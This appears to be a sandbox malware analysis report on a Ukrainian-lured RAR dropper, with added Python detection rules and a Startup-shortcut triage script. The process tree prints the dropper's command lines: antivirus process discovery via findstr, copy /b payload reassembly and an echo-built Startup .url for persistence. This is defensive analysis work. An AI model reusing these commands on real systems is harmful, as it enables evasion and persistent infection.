Windows Analysis Report
Запит СБУ.rar

Overview

General Information

Sample name: Запит СБУ.rar (Ukrainian for "SBU request"; СБУ is the Security Service of Ukraine)
(renamed by the sandbox because the original name is a hash value)
Original sample name: .rar
Analysis ID: 1546128
MD5: f46e12150b7b0e381c3cf871325eed8e
SHA1: 57d88bcbf4f6804cdaea6b9c06e0a2a204ec4a6a
SHA256: 35d6eab4f66ce38c0a8953b5fcb3b03bf9f042ca4a4ef8f0555ebabe39ac18f8

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Sigma detected: Suspicious Double Extension File Execution
Drops PE files with a suspicious file extension
Sigma detected: Suspicious Double Extension Files
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Drops PE files
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64_ra
  • OpenWith.exe (PID: 5868 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
    • 7zFM.exe (PID: 6544 cmdline: "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\Запит СБУ.rar" MD5: 30AC0B832D75598FB3EC37B6F2A8C86A)
      • notepad.exe (PID: 6832 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Local\Temp\7zO099FD947\??? ??????? 937463543.txt MD5: 27F71B12CB585541885A31BE22F61C83)
      • scan_doc_zapit_836893.pdf.exe (PID: 6728 cmdline: "C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe" MD5: CBCB0FF5AA471E22A6B129196A556D97)
        • cmd.exe (PID: 5712 cmdline: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7060 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7052 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • tasklist.exe (PID: 6628 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5484 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 1764 cmdline: cmd /c md 185027 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • findstr.exe (PID: 2844 cmdline: findstr /V "venezuelalandscapesmeantposters" Tournaments MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 2212 cmdline: cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Spy.pif (PID: 3284 cmdline: Spy.pif H MD5: 18CE19B57F43CE0A5AF149C96AECC685)
            • cmd.exe (PID: 4132 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & echo URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 1556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • choice.exe (PID: 2412 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • scan_doc_zapit_836893.pdf.exe (PID: 6376 cmdline: "C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe" MD5: CBCB0FF5AA471E22A6B129196A556D97)
    • cmd.exe (PID: 4896 cmdline: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 1940 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 636 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1436 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 1272 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6044 cmdline: cmd /c md 185027 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 4808 cmdline: cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Spy.pif (PID: 1240 cmdline: Spy.pif H MD5: 18CE19B57F43CE0A5AF149C96AECC685)
      • choice.exe (PID: 3192 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No yara matches
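Detection logic for the chain in the process tree above, added here as an example and not part of the Joe Sandbox report. It replays constructed process-creation events modelled on PIDs 6728, 5712, 7052, 5484, 2212, 3284 and 4132, plus two benign controls, through six rules covering the behaviours the Signatures list names: double-extension execution, the `copy Yes Yes.bat & Yes.bat` rename-and-run, `tasklist`/`findstr` antivirus discovery, `copy /b` reassembly of split fragments, a `.pif` launched from the user's Temp folder, and the echo-built Startup `.url`. The event record shape and the rule names are assumptions; the process names in AV_PROCESS_NAMES are copied from the findstr arguments in this report.

```python
"""Detection logic for the dropper chain in this report, run over constructed
process-creation events modelled on the command lines in the process tree."""
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record; the field names are an assumption, not Sysmon's schema."""
    pid: int
    image: str
    cmdline: str

DROPPER = r"C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
FINDSTR = r"C:\Windows\SysWOW64\findstr.exe"
SPY_PIF = r"C:\Users\user\AppData\Local\Temp\185027\Spy.pif"
URL_FILE = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url"
JS_FILE = r"C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js"

# Constructed events: the first seven mirror PIDs 6728, 5712, 7052, 5484, 2212, 3284 and 4132
# from the report; the last two are benign controls that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(6728, DROPPER, '"%s"' % DROPPER),
    ProcEvent(5712, CMD, r'"C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat'),
    ProcEvent(7052, FINDSTR, r'findstr /I "wrsa opssvc"'),
    ProcEvent(5484, FINDSTR, r'findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"'),
    ProcEvent(2212, CMD, r"cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined"
                         r" + ..\Already + ..\Presentations + ..\Hint H"),
    ProcEvent(3284, SPY_PIF, "Spy.pif H"),
    ProcEvent(4132, CMD, 'cmd /k echo [InternetShortcut] > "%s" & echo URL="%s" >> "%s" & exit'
                         % (URL_FILE, JS_FILE, URL_FILE)),
    ProcEvent(1000, r"C:\Windows\System32\notepad.exe",
              r'"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\notes.txt'),
    ProcEvent(1001, r"C:\Windows\System32\findstr.exe", r'findstr /I "error" app.log'),
]

# Security-product process names the batch script greps for in tasklist output (from the report).
AV_PROCESS_NAMES = {"wrsa", "opssvc", "avastui", "avgui", "bdservicehost", "nswscsvc", "sophoshealth"}
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
EXEC_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd"}

def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def double_extension(ev):
    """document.pdf.exe style names: a document extension masking an executable one."""
    parts = image_name(ev.image).split(".")
    return len(parts) >= 3 and parts[-2] in DOC_EXTS and parts[-1] in EXEC_EXTS

def copy_then_run_bat(ev):
    """copy X X.bat & X.bat: an extensionless blob renamed to a batch file and run at once."""
    return re.search(r"\bcopy\s+\S+\s+(\S+\.bat)\s*&\s*\1\b", ev.cmdline, re.IGNORECASE) is not None

def av_process_discovery(ev):
    """findstr invoked with security-product process names (the tasklist | findstr idiom)."""
    if image_name(ev.image) != "findstr.exe":
        return False
    tokens = set(re.findall(r"[a-z0-9_]+", ev.cmdline.lower()))
    return bool(tokens & AV_PROCESS_NAMES)

def chunk_reassembly(ev):
    """copy /b a + b + c out: binary concatenation of split fragments into one payload."""
    m = re.search(r"\bcopy\s+/b\b(.*)", ev.cmdline, re.IGNORECASE)
    return m is not None and m.group(1).count("+") >= 2

def pif_from_temp(ev):
    """A .pif (run as a PE by Windows) launched from the user's Temp directory."""
    low = ev.image.lower()
    return low.endswith(".pif") and "\\appdata\\local\\temp\\" in low

def startup_url_write(ev):
    """Shell redirection assembling an InternetShortcut inside the Startup folder."""
    low = ev.cmdline.lower()
    return "[internetshortcut]" in low and "\\start menu\\programs\\startup\\" in low and ".url" in low

RULES = {
    "double_extension_execution": double_extension,
    "copy_then_run_bat": copy_then_run_bat,
    "av_process_discovery": av_process_discovery,
    "binary_chunk_reassembly": chunk_reassembly,
    "pif_executed_from_temp": pif_from_temp,
    "startup_url_persistence": startup_url_write,
}

def evaluate(events):
    """Return {pid: [rule names]} for every event that trips at least one rule."""
    hits = {}
    for ev in events:
        matched = [name for name, rule in RULES.items() if rule(ev)]
        if matched:
            hits[ev.pid] = matched
    return hits

if __name__ == "__main__":
    for pid, names in evaluate(SAMPLE_EVENTS).items():
        print(pid, ", ".join(names))
```

The rules key on command-line shape rather than on the file names in this run (Yes, Martin, Spy.pif, NanoCipher), which are the parts most likely to change between builds of the same dropper; the antivirus name list is deliberately just the one observed here and should be widened from other reports before it is relied on.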

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe, ParentCommandLine: "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\Запит СБУ.rar", ParentImage: C:\Program Files\7-Zip\7zFM.exe, ParentProcessId: 6544, ParentProcessName: 7zFM.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe" , ProcessId: 6728, ProcessName: scan_doc_zapit_836893.pdf.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems), frack113 | Data: EventID: 11, Image: C:\Program Files\7-Zip\7zFM.exe, ProcessId: 6544, TargetFilename: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: Spy.pif H, CommandLine: Spy.pif H, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5712, ParentProcessName: cmd.exe, ProcessCommandLine: Spy.pif H, ProcessId: 3284, ProcessName: Spy.pif
Source: File created | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, ProcessId: 3284, TargetFilename: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe, ParentProcessId: 6728, ParentProcessName: scan_doc_zapit_836893.pdf.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, ProcessId: 5712, ProcessName: cmd.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, ProcessId: 3284, TargetFilename: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 4132, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url
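The Startup `.url` written by PID 4132 is the persistence mechanism in this run. The Python below is an added example, not part of the Joe Sandbox report: it parses InternetShortcut files the way the report's `cmd /k echo ...` sequence writes them (echo keeps the blank before `>`, so the section header carries a trailing space, and the quotes around the URL value are written literally) and flags shortcuts whose target is a local script or executable under a user-writable path rather than a web address. The three sample files are constructed; `scan_startup_folder` only finds real files when run on a Windows host.

```python
"""Triage of InternetShortcut (.url) files in the per-user Startup folder, the persistence
artefact PID 4132 writes in this report. Runs offline on constructed file contents."""
import glob
import os
import re
from urllib.parse import unquote

SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".bat", ".cmd", ".ps1", ".scr", ".pif", ".exe")
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")

# Constructed samples. The first reproduces what the report's `cmd /k echo ...` produces:
# echo keeps the blank before '>' (hence the trailing space) and writes the quotes literally.
SAMPLES = {
    "NanoCipher.url": "[InternetShortcut] \r\n"
                      + r'URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js"' + "\r\n",
    "Intranet.url": "[InternetShortcut]\r\nURL=https://intranet.example/portal\r\nIconIndex=0\r\n",
    "Readme.url": "[InternetShortcut]\r\nURL=file:///C:/Users/user/Documents/readme.txt\r\n",
}

def parse_url_file(text):
    """Return the key/value pairs of the [InternetShortcut] section, keys lower-cased."""
    fields, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()          # tolerate the trailing blank echo leaves before '>'
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[internetshortcut]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip().strip('"')   # quotes are written literally
    return fields

def normalise_target(url):
    """Convert file:/// URLs to Windows paths so local targets can be inspected uniformly."""
    if url.lower().startswith("file:///"):
        return unquote(url[len("file:///"):]).replace("/", "\\")
    return url

def is_local_path(target):
    return re.match(r"^[A-Za-z]:\\", target) is not None or target.startswith("\\\\")

def assess_url_file(name, text):
    """Flag shortcuts that launch a local script/executable instead of opening a web page."""
    target = normalise_target(parse_url_file(text).get("url", ""))
    reasons = []
    if is_local_path(target):
        reasons.append("target is a local file, not a web URL")
        low = target.lower()
        if low.endswith(SCRIPT_EXTS):
            reasons.append("target is a script or executable (." + low.rsplit(".", 1)[-1] + ")")
        if any(marker in low for marker in USER_WRITABLE_MARKERS):
            reasons.append("target lives in a user-writable directory")
    verdict = "suspicious" if len(reasons) >= 2 else "benign"
    return {"file": name, "target": target, "verdict": verdict, "reasons": reasons}

def scan_startup_folder(folder=None):
    """Assess every .url in the current user's Startup folder (empty list off Windows)."""
    if folder is None:
        folder = os.path.join(os.environ.get("APPDATA", ""),
                              r"Microsoft\Windows\Start Menu\Programs\Startup")
    results = []
    for path in glob.glob(os.path.join(folder, "*.url")):
        # cmd writes the OEM code page, so do not fail on non-UTF-8 bytes
        with open(path, encoding="utf-8", errors="replace") as fh:
            results.append(assess_url_file(os.path.basename(path), fh.read()))
    return results

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        result = assess_url_file(name, text)
        print("%s: %s -> %s" % (result["file"], result["verdict"], result["target"]))
        for reason in result["reasons"]:
            print("   -", reason)
    for result in scan_startup_folder():
        print(result)
```

A local `.txt` in Documents is reported as benign and an `https://` shortcut produces no reasons at all, so the check stays quiet on the legitimate uses of the Startup folder while catching the pattern seen here, a `.js` under `%LOCALAPPDATA%`.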

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5712, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 5484, ProcessName: findstr.exe
No Suricata rule has matched

All Signature Results

Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | File opened: C:\Users\user\AppData\Local
Source: unknown | DNS traffic detected: query: EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu, reply code: Name error (3, NXDOMAIN)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 events)
Source: global traffic | DNS traffic detected: DNS query: EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu
Source: C:\Program Files\7-Zip\7zFM.exe | Window created: window name: CLIPBRDWNDCLASS
Source: classification engine | Classification label: mal72.expl.evad.winRAR@51/17@2/0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif | File created: C:\Users\user\AppData\Local\NanoSec Cryptographics
Source: C:\Windows\System32\OpenWith.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2548:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1556:120:WilError_03
Source: C:\Program Files\7-Zip\7zFM.exe | File created: C:\Users\user\AppData\Local\Temp\7zO099FD947
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries (4 events): IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\OpenWith.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\OpenWith.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: C:\Windows\System32\OpenWith.exe | Process created: C:\Program Files\7-Zip\7zFM.exe "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\Запит СБУ.rar"
Source: C:\Program Files\7-Zip\7zFM.exe | Process created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Local\Temp\7zO099FD947\??? ??????? 937463543.txt
Source: C:\Program Files\7-Zip\7zFM.exe | Process created: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe "C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe"
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "venezuelalandscapesmeantposters" Tournaments
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & echo URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe "C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe"
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\System32\OpenWith.exe | Section loaded (in load order, repeats kept): kernel.appcore.dll, uxtheme.dll, onecoreuapcommonproxystub.dll, windows.storage.dll, wldp.dll, twinui.dll, wintypes.dll, powrprof.dll, dwmapi.dll, pdh.dll, umpdc.dll, onecorecommonproxystub.dll, actxprxy.dll, propsys.dll, windows.staterepositoryps.dll, windows.ui.appdefaults.dll, windows.ui.immersive.dll, profapi.dll, ntmarta.dll, uiautomationcore.dll, dui70.dll, duser.dll, dwrite.dll, bcp47mrm.dll, uianimation.dll, d3d11.dll, dxgi.dll, d3d10warp.dll, resourcepolicyclient.dll, dxcore.dll, dcomp.dll, oleacc.dll, edputil.dll, windows.ui.dll, windowmanagementapi.dll, textinputframework.dll, inputhost.dll, coremessaging.dll, coreuicomponents.dll, coreuicomponents.dll, coremessaging.dll, twinapi.appcore.dll, coremessaging.dll, twinapi.appcore.dll, windowscodecs.dll, thumbcache.dll, policymanager.dll, msvcp110_win.dll, apphelp.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, tiledatarepository.dll, staterepository.core.dll, windows.staterepository.dll, wtsapi32.dll, windows.staterepositorycore.dll, mrmcorer.dll, appxdeploymentclient.dll, sxs.dll, directmanipulation.dll, textshaping.dll, ninput.dll, explorerframe.dll, dataexchange.dll, windows.ui.fileexplorer.dll, xmllite.dll, structuredquery.dll, atlthunk.dll, windows.fileexplorer.common.dll, iertutil.dll, windows.storage.search.dll, linkinfo.dll, twinapi.dll, ntshrui.dll, sspicli.dll, srvcli.dll, cscapi.dll, winmm.dll, ehstorshell.dll, networkexplorer.dll, cscui.dll, urlmon.dll, netutils.dll, pcacli.dll, mpr.dll, sfc_os.dll
Source: C:\Program Files\7-Zip\7zFM.exe | Section loaded (in load order, repeats kept): uxtheme.dll, kernel.appcore.dll, textshaping.dll, windows.storage.dll, wldp.dll, windowscodecs.dll, profapi.dll, propsys.dll, explorerframe.dll, cryptbase.dll, thumbcache.dll, policymanager.dll, msvcp110_win.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, wintypes.dll, wintypes.dll, dataexchange.dll, d3d11.dll, dcomp.dll, dxgi.dll, twinapi.appcore.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, sfc_os.dll
Source: C:\Windows\System32\notepad.exe | Section loaded (in load order, repeats kept): kernel.appcore.dll, uxtheme.dll, mrmcorer.dll, windows.storage.dll, wldp.dll, textshaping.dll, efswrt.dll, mpr.dll, wintypes.dll, twinapi.appcore.dll, oleacc.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, policymanager.dll, msvcp110_win.dll
Source: C:\Program Files\7-Zip\7zFM.exe | Section loaded: apphelp.dll
